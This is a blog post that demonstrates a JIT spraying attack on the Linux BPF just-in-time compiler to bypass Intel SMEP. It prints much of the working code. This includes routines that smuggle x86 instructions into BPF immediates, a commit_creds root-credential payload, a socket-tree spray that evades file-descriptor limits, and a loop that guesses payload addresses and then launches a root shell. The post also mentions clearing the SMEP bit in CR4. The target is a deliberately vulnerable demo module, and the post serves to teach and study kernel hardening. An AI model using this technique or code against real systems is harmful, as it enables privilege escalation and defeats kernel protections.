Intel's new Ivy Bridge CPUs support a security feature called Supervisor Mode Execution Protection (SMEP). It's supposed to thwart privilege escalation attacks by preventing the kernel from executing a payload provided by userspace. In reality, there are many ways to bypass SMEP.

This article demonstrates one particularly fun approach. Since the Linux kernel implements a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if RLIMIT_NOFILE is set as low as 11.

If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is available on GitHub too.

Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.

Kernel exploitation and SMEP

The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.

In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!

But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent unintended execution of userspace code, as in a kernel exploit.)

So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with no-execute data, and the same techniques apply.

If you haven't seen any kernel exploits before, you might want to check out the talk I gave, or the many references linked from those slides.

JIT spraying

JIT spraying is a viable tactic when we (the attacker) control the input to a just-in-time compiler. The JIT will write into executable memory on our behalf, and we have some control over what it writes.

Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:

x = 0xa8XXYYZZ
x = 0xa8PPQQRR
x = ...

(Here XXYYZZ and PPQQRR stand for arbitrary three-byte quantities.) The JIT might decide to put variable x in the %eax machine register, and produce x86 code like this:

machine code      assembly (AT&T syntax)

b8 ZZ YY XX a8    mov $0xa8XXYYZZ, %eax
b8 RR QQ PP a8    mov $0xa8PPQQRR, %eax
b8 ...

Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like

ZZ YY XX          (payload instruction)
a8 b8             test $0xb8, %al
RR QQ PP          (payload instruction)
a8 b8             test $0xb8, %al
...

We control those bytes ZZ YY XX and RR QQ PP. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.
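To make the reinterpretation concrete, here is a small userspace sketch in C. It only builds the bytes a JIT would emit for a run of mov $imm, %eax instructions and copies out the view that starts one byte late; nothing is executed. The helper names encode_mov_eax and misaligned_view are made up for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Encode "mov $imm, %eax": opcode b8, then the immediate in little-endian order.
// Returns the number of bytes written (always 5).
size_t encode_mov_eax(uint8_t *out, uint32_t imm) {
    out[0] = 0xb8;
    out[1] = (uint8_t)(imm & 0xff);
    out[2] = (uint8_t)((imm >> 8) & 0xff);
    out[3] = (uint8_t)((imm >> 16) & 0xff);
    out[4] = (uint8_t)((imm >> 24) & 0xff);
    return 5;
}

// Copy the bytes the CPU would fetch if it entered 'code' at its second byte.
// 'view' must have room for len - 1 bytes. Returns the number of bytes copied.
size_t misaligned_view(const uint8_t *code, size_t len, uint8_t *view) {
    if (len < 1) {
        return 0;
    }
    memcpy(view, code + 1, len - 1);
    return len - 1;
}
```

With the immediates 0xa8ff3148 and 0xa8c78948, the misaligned view begins 48 31 ff, a8 b8, 48 89 c7: two three-byte payload slots separated by the test filler.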

Attacking the BPF JIT

Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are virtual machine programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally implements the BPF virtual machine using a just-in-time compiler.

For our JIT spray attack, we will build a BPF program in memory.

size_t code_len = 0;
struct sock_filter code[1024];

void emit_bpf(uint16_t opcode, uint32_t operand) {
    code[code_len++] = (struct sock_filter) BPF_STMT(opcode, operand);
}

A BPF "load immediate" instruction will compile to mov $x, %eax. We embed our payload instructions inside these, exactly as we saw above.

// Embed a three-byte x86 instruction.
void emit3(uint8_t x, uint8_t y, uint8_t z) {
    union {
        uint8_t  buf[4];
        uint32_t imm;
    } operand = {
        .buf = { x, y, z, 0xa8 }
    };

    emit_bpf(BPF_LD+BPF_IMM, operand.imm);
}

// Pad shorter instructions with nops.
#define emit2(_x, _y) emit3((_x), (_y), 0x90)
#define emit1(_x)     emit3((_x), 0x90, 0x90)

Remember, the byte a8 eats the opcode b8 from the following legitimate mov instruction, turning into the harmless instruction test $0xb8, %al.

Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.

void emit_call(uint32_t addr) {
    emit2(0xb4, (addr & 0xff000000) >> 24);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x00ff0000) >> 16);  // mov  $x,  %al
    emit3(0xc1, 0xe0, 0x10);                 // shl  $16, %eax
    emit2(0xb4, (addr & 0x0000ff00) >>  8);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x000000ff));        // mov  $x,  %al
    emit2(0x48, 0x98);                       // cltq
    emit2(0xff, 0xd0);                       // call *%rax
}
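The sign extension works because x86-64 kernel code and modules live in the top 2 GB of the address space, so a 64-bit function address is just the sign extension of its low 32 bits. To check the byte shuffling, here is a small model of what the emitted instructions do to %eax and %rax. It is a userspace simulation only, and simulate_emit_call is a name I made up for it.

```c
#include <stdint.h>

// Model of the register effects of the sequence built by emit_call.
// Returns the value %rax would hold just before "call *%rax".
// 'initial_eax' stands for whatever happened to be in %eax beforehand.
uint64_t simulate_emit_call(uint32_t addr, uint32_t initial_eax) {
    uint32_t eax = initial_eax;

    // mov $x, %ah ; mov $x, %al : top two bytes of addr into the low 16 bits
    eax = (eax & 0xffff00ffu) | (((addr >> 24) & 0xffu) << 8);
    eax = (eax & 0xffffff00u) | ((addr >> 16) & 0xffu);

    // shl $16, %eax : the stale upper half is shifted out, the low half is zeroed
    eax <<= 16;

    // mov $x, %ah ; mov $x, %al : bottom two bytes of addr
    eax = (eax & 0xffff00ffu) | (((addr >> 8) & 0xffu) << 8);
    eax = (eax & 0xffffff00u) | (addr & 0xffu);

    // cltq : sign-extend %eax into %rax
    uint64_t rax = eax;
    if (eax & 0x80000000u) {
        rax |= 0xffffffff00000000ull;
    }
    return rax;
}
```

Whatever garbage starts out in %eax, the result depends only on addr, because the shift discards the old upper half before the low bytes are loaded.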

Then we can build a classic "get root" payload like so:

emit3(0x48, 0x31, 0xff);  // xor  %rdi, %rdi
emit_call(get_kernel_symbol("prepare_kernel_cred"));
emit3(0x48, 0x89, 0xc7);  // mov  %rax, %rdi
emit_call(get_kernel_symbol("commit_creds"));
emit1(0xc3);              // ret

This is just the C call

commit_creds(prepare_kernel_cred(0));

expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.

Looking up function addresses is a well-studied part of kernel exploitation. My get_kernel_symbol just greps through /proc/kallsyms, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.
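For reference, a lookup of this kind can be sketched in a few lines of C. This is not my actual get_kernel_symbol; the names match_symbol_line and lookup_symbol are hypothetical. It assumes the usual /proc/kallsyms layout of a hex address, a one-character type, and a symbol name, optionally followed by a module name in brackets.

```c
#include <stdio.h>
#include <string.h>

// Parse one kallsyms-style line: "<hex address> <type> <name> [module]".
// Returns 1 and stores the address if the line names 'wanted', else 0.
int match_symbol_line(const char *line, const char *wanted,
                      unsigned long long *addr_out) {
    unsigned long long addr;
    char type;
    char name[256];

    if (sscanf(line, "%llx %c %255s", &addr, &type, name) != 3) {
        return 0;
    }
    if (strcmp(name, wanted) != 0) {
        return 0;
    }
    *addr_out = addr;
    return 1;
}

// Scan a symbol file for 'wanted'.
// Returns 0 if the file cannot be read or the symbol is absent.
unsigned long long lookup_symbol(const char *path, const char *wanted) {
    FILE *f = fopen(path, "r");
    char line[512];
    unsigned long long addr = 0;

    if (!f) {
        return 0;
    }
    while (fgets(line, sizeof(line), f)) {
        if (match_symbol_line(line, wanted, &addr)) {
            break;
        }
    }
    fclose(f);
    return addr;
}
```

A call such as lookup_symbol("/proc/kallsyms", "commit_creds") would be the typical use. On systems configured to hide kernel pointers from unprivileged users, the addresses read back as zero, which this sketch reports the same way as a missing symbol.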

Alternatively, the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just clear the SMEP bit (bit 20) of the CR4 control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.

Filling memory with sockets

The "spray" part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.

For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT uses module_alloc to allocate memory in the 1.5 GB space reserved for kernel modules. And the compiled program is aligned to a page, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.
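The arithmetic behind those figures, written out as a quick sketch. The constants are the ones quoted in the paragraph above (a 1.5 GB region, 4 kB pages, 8000 copies); the function names are made up for this illustration, and the model assumes each copy occupies its own page.

```c
#include <stdint.h>

#define MODULE_REGION_BYTES (1536ull * 1024 * 1024)  // 1.5 GB
#define PAGE_BYTES          4096ull                   // 4 kB

// Number of page-aligned addresses a JIT-compiled program could start at.
uint64_t candidate_pages(void) {
    return MODULE_REGION_BYTES / PAGE_BYTES;
}

// Smallest n such that 2^n >= value (for value up to 2^63).
unsigned bits_needed(uint64_t value) {
    unsigned n = 0;
    while ((1ull << n) < value) {
        n++;
    }
    return n;
}

// With 'copies' programs sprayed, one guess in this many is expected to hit
// (rounded down). Returns 0 if nothing was sprayed.
uint64_t guesses_per_hit(uint64_t copies) {
    if (copies == 0) {
        return 0;
    }
    return candidate_pages() / copies;
}
```

There are 393216 candidate pages, which is between 2^18 and 2^19, and 393216 / 8000 rounds down to 49, hence "1 in 50".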

Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the resource limit on the number of open files. But there's a fun way around this limitation. (I learned this trick from Nelson Elhage but I haven't seen it published before.)

UNIX domain sockets can transmit things other than raw bytes. In particular, they can transmit file descriptors¹. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!

So we can make as many BPF-filtered sockets as we want, as long as we send them into other sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth² of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.

#define SOCKET_FANOUT 20
#define SOCKET_DEPTH   3

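// Create a socket with our BPF program attached.
// 'filt' is defined elsewhere; SO_ATTACH_FILTER expects a struct sock_fprog
// (instruction count plus pointer), here presumably wrapping code[] and code_len.
int create_filtered_socket() {
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &filt, sizeof(filt));
    return fd;
}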

// Send an fd through a UNIX socket.
void send_fd(int dest, int fd_to_send);

// Create a whole bunch of filtered sockets.
void create_socket_tree(int parent, size_t depth) {
    int fds[2];
    size_t i;
    for (i=0; i<SOCKET_FANOUT; i++) {
        if (depth == (SOCKET_DEPTH - 1)) {
            // Leaf of the tree.
            // Create a filtered socket and send it to 'parent'.
            fds[0] = create_filtered_socket();
            send_fd(parent, fds[0]);
            close(fds[0]);
        } else {
            // Interior node of the tree.
            // Send a subtree into a UNIX socket pair.
            socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
            create_socket_tree(fds[0], depth+1);

            // Send the pair to 'parent' and close it.
            send_fd(parent, fds[0]);
            send_fd(parent, fds[1]);
            close(fds[0]);
            close(fds[1]);
        }
    }
}
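As a sanity check on the numbers, the same recursion can be run with counters instead of sockets. This sketch mirrors the shape of create_socket_tree; the function names are hypothetical. The second function counts only descriptors opened inside the tree at any one moment, not the root socket pair or stdin, stdout and stderr.

```c
#include <stddef.h>

#define FANOUT 20
#define DEPTH   3

// Number of filtered sockets created by a tree of this shape.
size_t count_filtered_sockets(size_t depth) {
    size_t total = 0;
    for (size_t i = 0; i < FANOUT; i++) {
        if (depth == DEPTH - 1) {
            total += 1;                                // leaf: one filtered socket
        } else {
            total += count_filtered_sockets(depth + 1);
        }
    }
    return total;
}

// Largest number of descriptors the tree itself holds open at once.
// Every iteration closes what it opened, so the peak is along one path:
// a socket pair at each interior level plus one socket at the leaf.
size_t peak_tree_fds(size_t depth) {
    if (depth == DEPTH - 1) {
        return 1;
    }
    return 2 + peak_tree_fds(depth + 1);
}
```

Starting from depth 0 this gives 8000 filtered sockets with only 5 descriptors held open by the tree at any time, which is why a very low RLIMIT_NOFILE is not an obstacle.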

The interface for sending FDs through a UNIX socket is really, really ugly, so I didn't show that code here. You can check out the implementation of send_fd if you want to.
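For readers who don't want to click through, here is a minimal sketch of the standard way to do it, using SCM_RIGHTS ancillary data with sendmsg. It is not the send_fd from my repository: the names send_fd_sketch and recv_fd_sketch are made up, and unlike the void send_fd declared above, this version reports errors through its return value.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

// Send one descriptor over a UNIX socket as SCM_RIGHTS ancillary data.
// Returns 0 on success, -1 on failure.
int send_fd_sketch(int dest, int fd_to_send) {
    char dummy = 'x';  // one byte of ordinary data to carry the control message
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;  // forces suitable alignment for buf
    } control;
    struct msghdr msg;
    struct cmsghdr *cmsg;

    memset(&control, 0, sizeof(control));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = control.buf;
    msg.msg_controllen = sizeof(control.buf);

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));

    return sendmsg(dest, &msg, 0) == 1 ? 0 : -1;
}

// Receive one descriptor. Returns the new descriptor number, or -1.
int recv_fd_sketch(int src) {
    char dummy;
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } control;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    int fd;

    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = control.buf;
    msg.msg_controllen = sizeof(control.buf);

    if (recvmsg(src, &msg, 0) < 0) {
        return -1;
    }
    cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg || cmsg->cmsg_level != SOL_SOCKET || cmsg->cmsg_type != SCM_RIGHTS) {
        return -1;
    }
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```

The sender can close its descriptor right after sending. The receiver still gets a working descriptor later, because the kernel keeps the underlying open file alive while it sits in the socket buffer, which is exactly the property the socket tree relies on.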

The exploit

Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure kernel module which will jump to any address we write to /proc/jump.

We know that a JIT-produced code page is somewhere in the region used for kernel modules. We want to land 3 bytes into this page, skipping an xor %eax, %eax (31 c0) and the initial b8 opcode.

#define MODULE_START 0xffffffffa0000000UL
#define MODULE_END   0xfffffffffff00000UL
#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)

#define PAYLOAD_OFFSET 3

A bad guess will likely oops the kernel and kill the current process. So we fork off child processes to do the guessing, and keep doing this as long as they're dying with SIGKILL.

int status, jump_fd, urandom;
unsigned int pgnum;
uint64_t payload_addr;

// ...

jump_fd = open("/proc/jump",   O_WRONLY);
urandom = open("/dev/urandom", O_RDONLY);

do {
    if (!fork()) {
        // Child process
        read(urandom, &pgnum, sizeof(pgnum));
        pgnum %= MODULE_PAGES;
        payload_addr = MODULE_START + (0x1000 * pgnum) + PAYLOAD_OFFSET;

        write(jump_fd, &payload_addr, sizeof(payload_addr));
        execl("/bin/sh", "sh", NULL);  // Root shell!
    } else {
        wait(&status);
    }
} while (WIFSIGNALED(status) && (WTERMSIG(status) == SIGKILL));
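The retry logic is easier to see in isolation. Below is a harmless stand-in for the loop above, with the fork and wait error checks filled in: instead of writing a guessed address to /proc/jump, a child that represents a bad guess simply sends itself SIGKILL. The function fork_until_survivor and its parameters are hypothetical, introduced only for this sketch.

```c
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

// Fork children one at a time until one is not killed by SIGKILL.
// Children numbered below 'first_survivor' kill themselves (a "bad guess");
// later ones exit normally (a "good guess").
// Returns the number of children forked, or -1 on error or when
// 'max_attempts' children have all been killed.
int fork_until_survivor(int first_survivor, int max_attempts) {
    int status = 0;
    int attempt = 0;

    do {
        if (attempt >= max_attempts) {
            return -1;
        }
        pid_t pid = fork();
        if (pid < 0) {
            return -1;
        }
        if (pid == 0) {
            // Child process
            if (attempt < first_survivor) {
                raise(SIGKILL);
            }
            _exit(0);
        }
        if (waitpid(pid, &status, 0) != pid) {
            return -1;
        }
        attempt++;
    } while (WIFSIGNALED(status) && WTERMSIG(status) == SIGKILL);

    return attempt;
}
```

Capping the number of attempts is a design choice of the sketch; the loop in the article keeps going for as long as children die with SIGKILL.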

The forked children get a copy of the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.

Notes

The full source is available on GitHub. It includes some error handling and cleanup code that I elided above.

I'll admit that this is mostly a curiosity, for two reasons:

SMEP is not widely deployed yet.
The BPF JIT is disabled by default, and distributions don't enable it.

Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for process sandboxing as well.

The BPF JIT is enabled by writing 1 to /proc/sys/net/core/bpf_jit_enable. You can write 2 to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.

I don't have a CPU with SMEP, but I did try a grsecurity / PaX hardened kernel. PaX's KERNEXEC feature implements³ in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)

The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...

¹ Actually, file descriptions. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.
² While testing this code, I got the error ETOOMANYREFS. This was easy to track down, as there's only one place in the entire kernel where it is used.
³ On i386, KERNEXEC uses x86 segmentation, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a GCC plugin to instrument every computed control flow instruction in the kernel. Specifically, it ors the target address with (1 << 63). If the target was a userspace address, the new address will be non-canonical and the processor will fault.
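The effect of that or-with-bit-63 trick can be checked with a few lines of C. This is only an illustration of the address arithmetic, not PaX code: the function names are made up, and the canonical-address test assumes 48-bit virtual addresses.

```c
#include <stdint.h>

// Set bit 63 of a computed branch target.
uint64_t force_high_bit(uint64_t target) {
    return target | (1ull << 63);
}

// With 48-bit virtual addresses, an address is canonical when
// bits 63..47 are all zeros or all ones.
int is_canonical_48(uint64_t addr) {
    uint64_t top = addr >> 47;  // the 17 bits 63..47
    return top == 0 || top == 0x1ffff;
}
```

A kernel address such as 0xffffffff81085a10 already has bit 63 set, so it passes through unchanged. A userspace address such as 0x00007f0012345000 becomes 0x80007f0012345000, which is not canonical, so the jump faults. Both example addresses are arbitrary values chosen for illustration.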

main is usually a function

Saturday, November 17, 2012

Attacking hardened Linux systems with kernel JIT spraying